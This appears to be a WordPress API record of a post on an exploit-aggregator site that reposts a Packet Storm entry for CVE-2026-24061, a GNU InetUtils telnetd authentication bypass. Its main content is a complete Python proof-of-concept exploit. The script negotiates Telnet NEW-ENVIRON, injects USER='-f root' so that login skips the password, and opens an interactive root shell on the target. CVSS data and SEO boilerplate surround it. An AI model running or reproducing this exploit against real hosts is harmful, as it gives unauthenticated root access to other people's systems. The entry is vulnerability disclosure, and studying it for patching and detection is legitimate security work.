{"id":51566,"date":"2026-05-05T16:48:11","date_gmt":"2026-05-05T16:48:11","guid":{"rendered":"https:\/\/zero.redgem.net\/?p=51566"},"modified":"2026-05-05T16:48:11","modified_gmt":"2026-05-05T16:48:11","slug":"gnu-inetutils-telnetd-remote-privilege-escalation","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=51566","title":{"rendered":"\ud83d\udcc4 GNU InetUtils telnetd Remote Privilege Escalation_PACKETSTORM:220370"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-05-05T21:31:22&#8243;,&#8221;description&#8221;:&#8221;GNU InetUtils versions 2.0 through 2.6 telnetd remote privilege escalation proof of concept exploit&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-05-05T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-05-05T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 GNU InetUtils telnetd Remote Privilege Escalation&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:220370&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2026-24061&#8243;],&#8221;sourceData&#8221;:&#8221;# Exploit Title: GNU InetUtils telnetd &#8211; Remote Privilege Escalation \\n    # Date: 2026-01-24\\n    # Exploit Author: Ali Guliyev (infat0x)\\n    # Author GitHub: https:\/\/github.com\/infat0x\\n    # Vendor Homepage: https:\/\/www.gnu.org\/software\/inetutils\/\\n    # Software Link: https:\/\/ftp.gnu.org\/gnu\/inetutils\/\\n    # Version: GNU InetUtils 2.0 through 2.6\\n    # Tested on: Linux (various distributions using vulnerable inetutils-telnetd)\\n    # CVE : CVE-2026-24061\\n    \\n    import socket\\n    import sys\\n    import threading\\n    import argparse\\n    import re\\n    \\n    \\&#8221;\\&#8221;\\&#8221;\\n    Description:\\n    The telnetd implementation in GNU InetUtils before 2.7-2 is vulnerable to \\n    authentication bypass via environment variable injection. By passing a \\n    crafted USER environment variable (e.g., \\&#8221;-f root\\&#8221;) during the Telnet \\n    NEW-ENVIRON subnegotiation, an attacker can force the login process \\n    to grant a root shell without requiring a password.\\n    \\n    Technical Analysis:\\n    The vulnerability exists because telnetd fails to sanitize the USER variable \\n    before passing it as an argument to \/bin\/login. By prepending the -f flag, \\n    the login utility skips the authentication phase.\\n    \\&#8221;\\&#8221;\\&#8221;\\n    \\n    # Telnet Protocol Constants (RFC 854)\\n    IAC  = 255  # Interpret As Command\\n    DONT = 254\\n    DO   = 253\\n    WONT = 252\\n    WILL = 251\\n    SB   = 250  # Subnegotiation Begin\\n    SE   = 240  # Subnegotiation End\\n    \\n    # Telnet Option Codes (RFC 1572)\\n    NEW_ENVIRON = 39 \\n    IS    = 0\\n    VAR   = 0\\n    VALUE = 1\\n    \\n    def handle_negotiation(sock, cmd, opt):\\n        \\&#8221;\\&#8221;\\&#8221;Responds to standard Telnet negotiation sequences.\\&#8221;\\&#8221;\\&#8221;\\n        if cmd == DO and opt == NEW_ENVIRON:\\n            # Agreement to use the environment variable passing option\\n            sock.sendall(bytes([IAC, WILL, NEW_ENVIRON]))\\n        elif cmd == DO:\\n            # Refuse other options for simplicity\\n            sock.sendall(bytes([IAC, WONT, opt]))\\n        elif cmd == WILL:\\n            # Acknowledge the server&#8217;s willingness\\n            sock.sendall(bytes([IAC, DO, opt]))\\n    \\n    def handle_subnegotiation(sock, sb_data, user_payload):\\n        \\&#8221;\\&#8221;\\&#8221;Executes the core exploit by injecting the malformed USER variable.\\&#8221;\\&#8221;\\&#8221;\\n        if len(sb_data) \\u003e 0 and sb_data[0] == NEW_ENVIRON:\\n            # Format: IAC SB NEW_ENVIRON IS VAR \\&#8221;USER\\&#8221; VALUE \\&#8221;-f root\\&#8221; IAC SE\\n            env_msg = (\\n                bytes([IAC, SB, NEW_ENVIRON, IS, VAR]) + \\n                b&#8217;USER&#8217; + \\n                bytes([VALUE]) + \\n                user_payload.encode(&#8216;ascii&#8217;) + \\n                bytes([IAC, SE])\\n            )\\n            sock.sendall(env_msg)\\n    \\n    def process_telnet_stream(data, sock, user_payload):\\n        \\&#8221;\\&#8221;\\&#8221;Parses incoming data to separate control signals from actual text.\\&#8221;\\&#8221;\\&#8221;\\n        clean_output = b&#8221;\\n        i = 0\\n        while i \\u003c len(data):\\n            if data[i] == IAC and i + 1 \\u003c len(data):\\n                cmd = data[i + 1]\\n                if cmd in [DO, DONT, WILL, WONT] and i + 2 \\u003c len(data):\\n                    handle_negotiation(sock, cmd, data[i + 2])\\n                    i += 3\\n                elif cmd == SB:\\n                    se_idx = i + 2\\n                    while se_idx \\u003c len(data) &#8211; 1:\\n                        if data[se_idx] == IAC and data[se_idx + 1] == SE:\\n                            break\\n                        se_idx += 1\\n                    if se_idx \\u003c len(data) &#8211; 1:\\n                        handle_subnegotiation(sock, data[i + 2:se_idx], user_payload)\\n                        i = se_idx + 2\\n                    else:\\n                        i += 1\\n                else:\\n                    i += 2\\n            else:\\n                clean_output += bytes([data[i]])\\n                i += 1\\n    \\n        # Filter ANSI escape sequences for a cleaner shell experience\\n        ansi_escape = re.compile(rb&#8217;\\\\x1b\\\\[[0-?]*[ -\/]*[@-~]&#8217;)\\n        return ansi_escape.sub(b&#8221;, clean_output)\\n    \\n    def socket_reader_thread(sock, user_payload):\\n        \\&#8221;\\&#8221;\\&#8221;Background thread to handle server output.\\&#8221;\\&#8221;\\&#8221;\\n        try:\\n            while True:\\n                raw_data = sock.recv(4096)\\n                if not raw_data:\\n                    break\\n                display_data = process_telnet_stream(raw_data, sock, user_payload)\\n                if display_data:\\n                    sys.stdout.buffer.write(display_data)\\n                    sys.stdout.buffer.flush()\\n        except (ConnectionResetError, BrokenPipeError):\\n            pass\\n        finally:\\n            print(\\&#8221;\\\\n[*] Connection closed.\\&#8221;)\\n    \\n    def main():\\n        parser = argparse.ArgumentParser(description=\\&#8221;CVE-2026-24061 Exploitation Tool\\&#8221;)\\n        parser.add_argument(&#8216;host&#8217;, help=\\&#8221;Target IP address\\&#8221;)\\n        parser.add_argument(&#8216;-p&#8217;, &#8216;&#8211;port&#8217;, type=int, default=23, help=\\&#8221;Telnet port (default 23)\\&#8221;)\\n        args = parser.parse_args()\\n    \\n        # The exploit payload to bypass login\\n        user_payload = \\&#8221;-f root\\&#8221;\\n        \\n        try:\\n            client_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\\n            client_sock.settimeout(5)\\n            client_sock.connect((args.host, args.port))\\n            client_sock.settimeout(None)\\n            print(f\\&#8221;[*] Connected to {args.host}:{args.port}\\&#8221;)\\n            print(f\\&#8221;[*] Sending payload: {user_payload}\\&#8221;)\\n        except Exception as e:\\n            print(f\\&#8221;[!] Connection failed: {e}\\&#8221;)\\n            sys.exit(1)\\n    \\n        # Launch output listener\\n        threading.Thread(target=socket_reader_thread, args=(client_sock, user_payload), daemon=True).start()\\n    \\n        print(\\&#8221;[*] Interactive session started. Type commands below.\\\\n\\&#8221;)\\n        try:\\n            while True:\\n                # Simple interactive shell loop\\n                char = sys.stdin.read(1)\\n                if not char:\\n                    break\\n                client_sock.sendall(char.encode())\\n        except KeyboardInterrupt:\\n            print(\\&#8221;\\\\n[*] Exploit session terminated by user.\\&#8221;)\\n        finally:\\n            client_sock.close()\\n    \\n    if __name__ == \\&#8221;__main__\\&#8221;:\\n        main()&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/220370&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:9.8,&#8221;severity&#8221;:&#8221;CRITICAL&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/220370\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-05-05T21:31:22&#8243;,&#8221;description&#8221;:&#8221;GNU InetUtils versions 2.0 through 2.6 telnetd remote privilege escalation proof of concept exploit&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-05-05T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-05-05T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 GNU InetUtils telnetd Remote Privilege Escalation&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:220370&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2026-24061&#8243;],&#8221;sourceData&#8221;:&#8221;# Exploit Title: GNU InetUtils telnetd&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-51566","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 GNU InetUtils telnetd Remote Privilege Escalation_PACKETSTORM:220370 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=51566\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 GNU InetUtils telnetd Remote Privilege Escalation_PACKETSTORM:220370 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-05-05T21:31:22&#8243;,&#8221;description&#8221;:&#8221;GNU InetUtils versions 2.0 through 2.6 telnetd remote privilege escalation proof of concept exploit&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-05-05T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-05-05T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 GNU InetUtils telnetd Remote Privilege Escalation&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:220370&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2026-24061&#8243;],&#8221;sourceData&#8221;:&#8221;# Exploit Title: GNU InetUtils telnetd...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=51566\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-05-05T16:48:11+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=51566#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=51566\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 GNU InetUtils telnetd Remote Privilege Escalation_PACKETSTORM:220370\",\"datePublished\":\"2026-05-05T16:48:11+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=51566\"},\"wordCount\":951,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.8\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=51566#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=51566\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=51566\",\"name\":\"\ud83d\udcc4 GNU InetUtils telnetd Remote Privilege Escalation_PACKETSTORM:220370 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-05-05T16:48:11+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=51566#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=51566\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=51566#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 GNU InetUtils telnetd Remote Privilege Escalation_PACKETSTORM:220370\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 GNU InetUtils telnetd Remote Privilege Escalation_PACKETSTORM:220370 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=51566","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 GNU InetUtils telnetd Remote Privilege Escalation_PACKETSTORM:220370 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-05-05T21:31:22&#8243;,&#8221;description&#8221;:&#8221;GNU InetUtils versions 2.0 through 2.6 telnetd remote privilege escalation proof of concept exploit&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-05-05T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-05-05T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 GNU InetUtils telnetd Remote Privilege Escalation&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:220370&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2026-24061&#8243;],&#8221;sourceData&#8221;:&#8221;# Exploit Title: GNU InetUtils telnetd...","og_url":"https:\/\/zero.redgem.net\/?p=51566","og_site_name":"zero redgem","article_published_time":"2026-05-05T16:48:11+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=51566#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=51566"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 GNU InetUtils telnetd Remote Privilege Escalation_PACKETSTORM:220370","datePublished":"2026-05-05T16:48:11+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=51566"},"wordCount":951,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.8","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=51566#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=51566","url":"https:\/\/zero.redgem.net\/?p=51566","name":"\ud83d\udcc4 GNU InetUtils telnetd Remote Privilege Escalation_PACKETSTORM:220370 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-05-05T16:48:11+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=51566#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=51566"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=51566#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 GNU InetUtils telnetd Remote Privilege Escalation_PACKETSTORM:220370"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/51566","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=51566"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/51566\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=51566"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=51566"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=51566"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}